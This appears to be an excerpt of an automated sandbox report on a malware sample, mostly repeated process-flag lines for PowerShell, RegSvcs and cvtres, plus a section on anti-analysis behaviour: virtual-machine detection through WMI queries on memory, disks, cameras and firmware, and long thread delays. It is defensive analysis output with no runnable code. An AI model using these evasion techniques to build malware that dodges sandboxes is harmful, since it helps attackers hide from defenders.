Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6480, type: MEMORYSTR

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Memory allocated: 2A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Program Files\Mozilla Firefox\firefox.exe

Code function: 36_2_000002163BAA89F7 rdtsc

36_2_000002163BAA89F7

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4129	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5701	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1762	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8064	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4772	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 631	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6083	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 3438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Window / User API: threadDelayed 7269	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Window / User API: threadDelayed 2391	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4256	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3644	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 908	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1216	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_0043F0C1 FindFirstFileExW,

3_2_0043F0C1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004093D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

3_2_004093D0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 39000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 38875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 38766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 38656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 38547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 38438	Jump to behavior
